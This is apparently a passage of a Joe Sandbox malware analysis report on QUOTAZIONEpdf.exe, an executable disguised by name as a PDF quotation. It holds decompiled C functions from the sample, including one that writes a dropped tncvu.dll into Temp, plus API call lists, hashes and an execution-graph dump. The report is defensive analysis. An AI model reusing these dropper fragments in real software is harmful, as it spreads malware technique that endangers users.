                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                				int _t5;
                				long _t7;
                				struct _OVERLAPPED* _t11;
                				intOrPtr* _t15;
                				void* _t17;
                				int _t21;
                
                				_t15 = __esi;
                				_t11 = __ebx;
                				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                					_t7 = lstrlenA(E004029E8(0x11));
                				} else {
                					E004029CB(1);
                					 *0x409f68 = __al;
                				}
                				if( *_t15 == _t11) {
                					L8:
                					 *((intOrPtr*)(_t17 - 4)) = 1;
                				} else {
                					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll", _t7, _t17 + 8, _t11);
                					_t21 = _t5;
                					if(_t21 == 0) {
                						goto L8;
                					}
                				}
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                				return 0;
                			}










                APIs
                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                Strings
                • C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll, xrefs: 004024BC, 004024E1
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileWritelstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll
                • API String ID: 427699356-525533019
                • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004055BF(char* _a4) {
                				char* _t3;
                				char* _t5;
                
                				_t5 = _a4;
                				_t3 =  &(_t5[lstrlenA(_t5)]);
                				while( *_t3 != 0x5c) {
                					_t3 = CharPrevA(_t5, _t3);
                					if(_t3 > _t5) {
                						continue;
                					}
                					break;
                				}
                				 *_t3 =  *_t3 & 0x00000000;
                				return  &(_t3[1]);
                			}






                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 004055C5
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 004055D3
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-1669384263
                • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004056D1(CHAR* _a4, CHAR* _a8) {
                				int _t10;
                				int _t15;
                				CHAR* _t16;
                
                				_t15 = lstrlenA(_a8);
                				_t16 = _a4;
                				while(lstrlenA(_t16) >= _t15) {
                					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                					_t10 = lstrcmpiA(_t16, _a8);
                					if(_t10 == 0) {
                						return _t16;
                					}
                					_t16 = CharNextA(_t16);
                				}
                				return 0;
                			}







                APIs
                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:31.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:2.3%
                Total number of Nodes:1846
                Total number of Limit Nodes:92

                Graph

9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 
9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 9227->9228 9229 403642 9228->9229 9229->9200 9231 4031e5 4 API calls 9230->9231 9232 40365c 9231->9232 9232->9198 9833 40f252 9834 404bee 6 API calls 9833->9834 9835 40f269 9834->9835 9836 404bee 6 API calls 9835->9836 9847 40f2ff 9835->9847 9837 40f282 9836->9837 9838 404bee 6 API calls 9837->9838 9839 40f290 9838->9839 9850 404c4e 9839->9850 9841 40f2a7 9842 405872 4 API calls 9841->9842 9841->9847 9843 40f2cd 9842->9843 9844 405872 4 API calls 9843->9844 9845 40f2dc 9844->9845 9846 405872 4 API calls 9845->9846 9848 40f2ee 9846->9848 9849 405762 4 API calls 9848->9849 9849->9847 9851 402b7c 2 API calls 9850->9851 9853 404c60 9851->9853 9852 404ca4 9852->9841 
9853->9852 9854 4031e5 4 API calls 9853->9854 9855 404c8d 9854->9855 9855->9852 9856 402bab 2 API calls 9855->9856 9856->9852 9857 41045c 9858 4040bb 12 API calls 9857->9858 9859 410477 9858->9859 9860 41060b 9859->9860 9888 407851 9859->9888 9862 41048f 9864 407851 2 API calls 9862->9864 9868 410604 9862->9868 9863 403f9e 5 API calls 9863->9860 9865 4104a9 9864->9865 9870 4105e0 9865->9870 9871 405ae9 6 API calls 9865->9871 9873 41056f 9865->9873 9874 4105eb 9865->9874 9866 402bab 2 API calls 9866->9868 9867 402bab 2 API calls 9869 4105fb 9867->9869 9868->9863 9869->9866 9872 402bab 2 API calls 9870->9872 9870->9874 9871->9865 9872->9874 9873->9870 9875 4105d6 9873->9875 9877 412269 6 API calls 9873->9877 9874->9867 9874->9869 9876 402bab 2 API calls 9875->9876 9876->9870 9878 410580 9877->9878 9878->9875 9879 405872 4 API calls 9878->9879 9880 410599 9879->9880 9881 405872 4 API calls 9880->9881 9882 4105a9 9881->9882 9883 405872 4 API calls 9882->9883 9884 4105bb 9883->9884 9885 405872 4 API calls 9884->9885 9886 4105cd 9885->9886 9887 402bab 2 API calls 9886->9887 9887->9875 9889 407866 9888->9889 9890 402b7c 2 API calls 9889->9890 9891 407899 9889->9891 9890->9891 9891->9862 9294 40f561 9297 40f4b6 9294->9297 9298 413b28 6 API calls 9297->9298 9299 40f4bf 9298->9299 9300 405b6f 6 API calls 9299->9300 9301 402bab GetProcessHeap RtlFreeHeap 9299->9301 9302 413a58 13 API calls 9299->9302 9303 40f559 9299->9303 9300->9299 9301->9299 9302->9299 9307 403b64 9308 4031e5 4 API calls 9307->9308 9309 403b77 PathFileExistsW 9308->9309 9923 40d069 9924 404bee 6 API calls 9923->9924 9925 40d080 9924->9925 9926 404bee 6 API calls 9925->9926 9948 40d1e2 9925->9948 9927 40d099 9926->9927 9928 404bee 6 API calls 9927->9928 9929 40d0a7 9928->9929 9964 404ba7 9929->9964 9932 404bee 6 API calls 9933 40d0c5 9932->9933 9934 404c4e 6 API calls 9933->9934 9935 40d0dc 9934->9935 9936 404bee 6 API calls 9935->9936 9937 40d0eb 9936->9937 9938 404ba7 4 API calls 9937->9938 9939 40d0fa 
9938->9939 9940 404bee 6 API calls 9939->9940 9941 40d109 9940->9941 9942 404c4e 6 API calls 9941->9942 9943 40d123 9942->9943 9944 405872 4 API calls 9943->9944 9943->9948 9945 40d14a 9944->9945 9946 405872 4 API calls 9945->9946 9947 40d159 9946->9947 9949 405872 4 API calls 9947->9949 9950 40d16b 9949->9950 9951 405781 4 API calls 9950->9951 9952 40d179 9951->9952 9953 405872 4 API calls 9952->9953 9954 40d18b 9953->9954 9955 405762 4 API calls 9954->9955 9956 40d19f 9955->9956 9957 405872 4 API calls 9956->9957 9958 40d1b1 9957->9958 9959 405781 4 API calls 9958->9959 9960 40d1bf 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d1d1 9961->9962 9963 405762 4 API calls 9962->9963 9963->9948 9965 4031e5 4 API calls 9964->9965 9966 404bca 9965->9966 9966->9932 9336 40f16e 9337 4056bf 2 API calls 9336->9337 9338 40f17b 9337->9338 9339 412093 20 API calls 9338->9339 9340 40f19e 9339->9340 9341 412093 20 API calls 9340->9341 9342 40f1b6 9341->9342 9343 412093 20 API calls 9342->9343 9344 40f1cc 9343->9344 9345 412093 20 API calls 9344->9345 9346 40f1e2 9345->9346 9347 413aca 4 API calls 9346->9347 9348 40f1ef 9347->9348 9349 405695 2 API calls 9348->9349 9350 40f1fa 9349->9350 9351 40ce71 9352 413b28 6 API calls 9351->9352 9353 40ce78 9352->9353 9354 405b6f 6 API calls 9353->9354 9355 40ce83 9354->9355 9359 40ceba 9355->9359 9362 403d74 19 API calls 9355->9362 9363 40cec1 9355->9363 9356 403fbf 7 API calls 9357 40cecc 9356->9357 9358 40cefb 9357->9358 9361 403d74 19 API calls 9357->9361 9360 402bab 2 API calls 9359->9360 9360->9363 9364 40cee7 9361->9364 9365 40cead 9362->9365 9363->9356 9366 40cef4 9364->9366 9369 402bab 2 API calls 9364->9369 9365->9359 9368 402bab 2 API calls 9365->9368 9367 402bab 2 API calls 9366->9367 9367->9358 9368->9359 9369->9366 9370 406472 9371 4031e5 4 API calls 9370->9371 9372 406484 Sleep 9371->9372 10040 40f204 10041 405781 4 API calls 10040->10041 10042 40f214 10041->10042 10043 4057df 13 API calls 10042->10043 10044 40f226 
10043->10044 9430 403c08 9431 4031e5 4 API calls 9430->9431 9432 403c1a DeleteFileW 9431->9432 9433 410a09 9434 41219c 14 API calls 9433->9434 9435 410a1b 9434->9435 9436 41219c 14 API calls 9435->9436 9437 410a23 9436->9437 9438 41219c 14 API calls 9437->9438 9439 410a2c 9438->9439 9440 41219c 14 API calls 9439->9440 9441 410a38 9440->9441 9442 404b22 6 API calls 9441->9442 9443 410a4c 9442->9443 9444 403fbf 7 API calls 9443->9444 9450 410a7a 9443->9450 9445 410a5c 9444->9445 9446 410a71 9445->9446 9447 413a58 13 API calls 9445->9447 9448 402bab 2 API calls 9446->9448 9449 410a6b 9447->9449 9448->9450 9451 402bab 2 API calls 9449->9451 9451->9446 10045 410d09 10046 410d56 10045->10046 10047 410d17 10045->10047 10049 413a58 13 API calls 10046->10049 10061 406642 10047->10061 10051 410d6f 10049->10051 10052 4056bf 2 API calls 10053 410d2e 10052->10053 10074 405641 10053->10074 10055 410d41 10056 413aca 4 API calls 10055->10056 10057 410d4a 10056->10057 10058 405695 2 API calls 10057->10058 10059 410d50 10058->10059 10060 4036a3 4 API calls 10059->10060 10060->10046 10062 406662 10061->10062 10063 4031e5 4 API calls 10062->10063 10064 406676 10063->10064 10078 4066bf 10064->10078 10069 4066b1 10072 4036a3 4 API calls 10069->10072 10070 4066a7 10071 4036a3 4 API calls 10070->10071 10073 4066ac 10071->10073 10072->10073 10073->10046 10073->10052 10075 40564d 10074->10075 10076 405673 10074->10076 10075->10076 10077 4056fc 4 API calls 10075->10077 10076->10055 10077->10076 10079 4031e5 4 API calls 10078->10079 10080 4066dc 10079->10080 10081 4066f6 SetLastError 10080->10081 10082 406708 GetLastError 10080->10082 10099 406693 10081->10099 10083 406713 10082->10083 10082->10099 10084 4031e5 4 API calls 10083->10084 10085 406725 10084->10085 10086 4031e5 4 API calls 10085->10086 10085->10099 10087 40673f 10086->10087 10088 406753 10087->10088 10089 406749 10087->10089 10091 4031e5 4 API calls 10088->10091 10090 4036a3 4 API calls 10089->10090 10090->10099 10092 406761 
10091->10092 10093 40678a 10092->10093 10094 40677c 10092->10094 10096 4036a3 4 API calls 10093->10096 10095 4036a3 4 API calls 10094->10095 10097 406781 10095->10097 10096->10099 10098 4036a3 4 API calls 10097->10098 10098->10099 10100 406455 10099->10100 10101 4031e5 4 API calls 10100->10101 10102 406468 10101->10102 10102->10069 10102->10070 9452 40c509 9453 412093 20 API calls 9452->9453 9454 40c51e 9453->9454 9461 40910d 9462 404b22 6 API calls 9461->9462 9463 409124 9462->9463 9464 40917a 9463->9464 9465 405b6f 6 API calls 9463->9465 9466 40913e 9465->9466 9468 404b22 6 API calls 9466->9468 9472 409173 9466->9472 9467 402bab 2 API calls 9467->9464 9469 409153 9468->9469 9471 409408 15 API calls 9469->9471 9475 40916a 9469->9475 9470 402bab 2 API calls 9470->9472 9473 409164 9471->9473 9472->9467 9474 402bab 2 API calls 9473->9474 9474->9475 9475->9470 9479 410410 9480 4056bf 2 API calls 9479->9480 9481 41041b 9480->9481 9482 412093 20 API calls 9481->9482 9483 41043c 9482->9483 9484 413aca 4 API calls 9483->9484 9485 410449 9484->9485 9486 405695 2 API calls 9485->9486 9487 410454 9486->9487 9514 40c71a 9515 41219c 14 API calls 9514->9515 9516 40c728 9515->9516 10158 410b1a 10159 404bee 6 API calls 10158->10159 10161 410b31 10159->10161 10160 410c6d 10161->10160 10162 404bee 6 API calls 10161->10162 10163 410b5a 10162->10163 10164 404bee 6 API calls 10163->10164 10165 410b69 10164->10165 10166 404bee 6 API calls 10165->10166 10167 410b78 10166->10167 10168 404ba7 4 API calls 10167->10168 10169 410b86 10168->10169 10170 404ba7 4 API calls 10169->10170 10171 410b95 10170->10171 10171->10160 10172 405872 4 API calls 10171->10172 10173 410bd7 10172->10173 10174 405872 4 API calls 10173->10174 10175 410be8 10174->10175 10176 405872 4 API calls 10175->10176 10177 410bf9 10176->10177 10178 405781 4 API calls 10177->10178 10179 410c07 10178->10179 10180 405781 4 API calls 10179->10180 10184 410c15 10180->10184 10181 410c4e 10182 405762 4 API calls 10181->10182 10183 
410c60 10182->10183 10183->10160 10185 403f9e 5 API calls 10183->10185 10184->10181 10191 405e5a 10184->10191 10185->10160 10188 4040bb 12 API calls 10189 410c44 10188->10189 10190 402bab 2 API calls 10189->10190 10190->10181 10192 402b7c 2 API calls 10191->10192 10193 405e72 10192->10193 10194 4031e5 4 API calls 10193->10194 10197 405ea3 10193->10197 10195 405e94 10194->10195 10196 402bab 2 API calls 10195->10196 10195->10197 10196->10197 10197->10181 10197->10188 10198 40f81c 10199 404bee 6 API calls 10198->10199 10200 40f833 10199->10200 10201 404bee 6 API calls 10200->10201 10215 40f94f 10200->10215 10202 40f85c 10201->10202 10203 404bee 6 API calls 10202->10203 10204 40f86b 10203->10204 10205 404bee 6 API calls 10204->10205 10206 40f87a 10205->10206 10207 404bee 6 API calls 10206->10207 10208 40f888 10207->10208 10209 404ba7 4 API calls 10208->10209 10210 40f897 10209->10210 10211 405872 4 API calls 10210->10211 10210->10215 10212 40f8d8 10211->10212 10213 405872 4 API calls 10212->10213 10214 40f8ea 10213->10214 10216 405872 4 API calls 10214->10216 10217 40f8fa 10216->10217 10218 405872 4 API calls 10217->10218 10219 40f90c 10218->10219 10220 405781 4 API calls 10219->10220 10221 40f91d 10220->10221 10222 4040bb 12 API calls 10221->10222 10223 40f92d 10222->10223 10224 405762 4 API calls 10223->10224 10225 40f93f 10224->10225 10225->10215 10226 403f9e 5 API calls 10225->10226 10226->10215 9529 402c1f 9530 4031e5 4 API calls 9529->9530 9531 402c31 LoadLibraryW 9530->9531 10236 407e1f 10237 407e2c 10236->10237 10240 407e61 10236->10240 10241 407e3e 10237->10241 10243 402bab 2 API calls 10237->10243 10245 407e51 10237->10245 10238 407eb6 10238->10245 10246 402bab 2 API calls 10238->10246 10239 407ed4 10240->10238 10247 405872 4 API calls 10240->10247 10253 407ea6 10240->10253 10241->10239 10244 402bab 2 API calls 10241->10244 10242 402bab 2 API calls 10242->10238 10243->10241 10244->10245 10245->10239 10248 402bab 2 API calls 10245->10248 10246->10245 10249 
407e86 10247->10249 10248->10239 10250 405872 4 API calls 10249->10250 10251 407e96 10250->10251 10252 405872 4 API calls 10251->10252 10252->10253 10253->10238 10253->10242 9544 405924 9545 4031e5 4 API calls 9544->9545 9546 405937 StrStrW 9545->9546 10262 410927 10263 4044ee 7 API calls 10262->10263 10264 41093d 10263->10264 10265 4109a4 10264->10265 10266 4056bf 2 API calls 10264->10266 10269 410954 10266->10269 10267 4044ee 7 API calls 10267->10269 10269->10267 10270 410990 10269->10270 10271 402bab 2 API calls 10269->10271 10277 41080e 10269->10277 10272 413aca 4 API calls 10270->10272 10271->10269 10273 410998 10272->10273 10274 405695 2 API calls 10273->10274 10275 41099e 10274->10275 10276 402bab 2 API calls 10275->10276 10276->10265 10278 410821 10277->10278 10288 41091f 10278->10288 10289 410701 10278->10289 10281 405872 4 API calls 10282 410900 10281->10282 10283 405872 4 API calls 10282->10283 10284 41090d 10283->10284 10285 405872 4 API calls 10284->10285 10286 410919 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10288 10288->10269 10290 405f08 4 API calls 10289->10290 10292 410713 10290->10292 10291 410804 10291->10281 10291->10288 10292->10291 10293 402b7c 2 API calls 10292->10293 10294 410748 10293->10294 10296 402b7c 2 API calls 10294->10296 10298 4107fd 10294->10298 10295 402bab 2 API calls 10295->10291 10299 4107ad 10296->10299 10297 402bab 2 API calls 10297->10298 10298->10295 10299->10297 10300 40d726 10301 404bee 6 API calls 10300->10301 10302 40d73f 10301->10302 10303 40db63 10302->10303 10304 405872 4 API calls 10302->10304 10307 40d761 10304->10307 10305 404bee 6 API calls 10305->10307 10306 405872 4 API calls 10306->10307 10307->10305 10307->10306 10309 40d971 10307->10309 10308 404ba7 4 API calls 10308->10309 10309->10308 10310 405781 4 API calls 10309->10310 10314 40d9bb 10309->10314 10310->10309 10311 404c4e 6 API calls 10311->10314 10312 405781 4 API calls 10312->10314 10313 4037be 4 API calls 10313->10314 10314->10303 
10314->10311 10314->10312 10314->10313 10315 405872 4 API calls 10314->10315 10315->10314 9602 40f12f 9603 41219c 14 API calls 9602->9603 9604 40f13f 9603->9604 9605 41219c 14 API calls 9604->9605 9606 40f14c 9605->9606 9607 41219c 14 API calls 9606->9607 9608 40f159 9607->9608 9609 41219c 14 API calls 9608->9609 9610 40f166 9609->9610 9617 40ed35 9618 4056bf 2 API calls 9617->9618 9619 40ed42 9618->9619 9620 412093 20 API calls 9619->9620 9621 40ed63 9620->9621 9622 412093 20 API calls 9621->9622 9623 40ed73 9622->9623 9624 413aca 4 API calls 9623->9624 9625 40ed80 9624->9625 9626 405695 2 API calls 9625->9626 9627 40ed8e 9626->9627 8071 40f3c5 8076 41219c 8071->8076 8074 41219c 14 API calls 8075 40f3e1 8074->8075 8077 4121b1 8076->8077 8093 40f3d3 8076->8093 8078 4121be 8077->8078 8082 4121c5 8077->8082 8124 413ba4 8078->8124 8080 4121ca 8094 404056 8080->8094 8082->8080 8087 412210 8082->8087 8083 4121c3 8083->8093 8101 405b6f 8083->8101 8086 41224d 8091 402bab 2 API calls 8086->8091 8086->8093 8087->8093 8129 403fbf 8087->8129 8091->8093 8093->8074 8140 402b7c GetProcessHeap RtlAllocateHeap 8094->8140 8096 404066 8098 404095 8096->8098 8142 4031e5 8096->8142 8098->8083 8100 402bab 2 API calls 8100->8098 8102 405b7d 8101->8102 8103 402b7c 2 API calls 8102->8103 8104 405b99 8103->8104 8113 405c02 8104->8113 8178 4059b8 8104->8178 8106 405c09 8108 402bab 2 API calls 8106->8108 8107 405bba 8107->8106 8109 402b7c 2 API calls 8107->8109 8108->8113 8110 405bdd 8109->8110 8110->8106 8111 405be4 8110->8111 8112 402bab 2 API calls 8111->8112 8112->8113 8113->8086 8114 413a58 8113->8114 8115 413a63 8114->8115 8123 412245 8114->8123 8115->8123 8181 405781 8115->8181 8118 405781 4 API calls 8119 413aa0 8118->8119 8184 4057df 8119->8184 8122 405781 4 API calls 8122->8123 8137 402bab 8123->8137 8125 413bad 8124->8125 8126 404056 6 API calls 8125->8126 8128 413bb8 8125->8128 8127 413bc5 8126->8127 8127->8083 8128->8083 8130 402b7c 2 API calls 8129->8130 8131 403fcf 8130->8131 
8136 403ff4 8131->8136 8303 403b98 8131->8303 8134 403ff8 GetLastError 8135 402bab 2 API calls 8134->8135 8135->8136 8136->8083 8138 402bb4 GetProcessHeap RtlFreeHeap 8137->8138 8139 402bc6 8137->8139 8138->8139 8139->8086 8141 402b98 8140->8141 8141->8096 8143 4031f3 8142->8143 8144 403236 8142->8144 8143->8144 8147 403208 8143->8147 8153 4030a5 8144->8153 8146 403224 8149 403258 8146->8149 8151 4031e5 4 API calls 8146->8151 8159 403263 8147->8159 8149->8098 8149->8100 8150 40320d 8150->8149 8152 4030a5 4 API calls 8150->8152 8151->8149 8152->8146 8165 402ca4 8153->8165 8155 4030b0 8156 4030b5 8155->8156 8169 4030c4 8155->8169 8156->8146 8160 40326d 8159->8160 8161 402b7c 2 API calls 8160->8161 8164 4032b7 8160->8164 8162 40328c 8161->8162 8163 402b7c 2 API calls 8162->8163 8163->8164 8164->8150 8166 403079 8165->8166 8167 40307c 8166->8167 8173 40317b GetPEB 8166->8173 8167->8155 8171 4030eb 8169->8171 8170 4030c0 8170->8146 8171->8170 8175 402c03 8171->8175 8174 40319b 8173->8174 8174->8167 8176 4031e5 3 API calls 8175->8176 8177 402c15 GetProcAddress 8176->8177 8177->8170 8179 4031e5 4 API calls 8178->8179 8180 4059cb 8179->8180 8180->8107 8199 405797 8181->8199 8183 405792 8183->8118 8185 405832 8184->8185 8186 4057eb 8184->8186 8185->8122 8185->8123 8186->8185 8209 4040bb 8186->8209 8189 405839 8191 405853 8189->8191 8236 405627 8189->8236 8190 40582c 8233 403f9e 8190->8233 8247 405762 8191->8247 8197 403f9e 5 API calls 8197->8185 8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 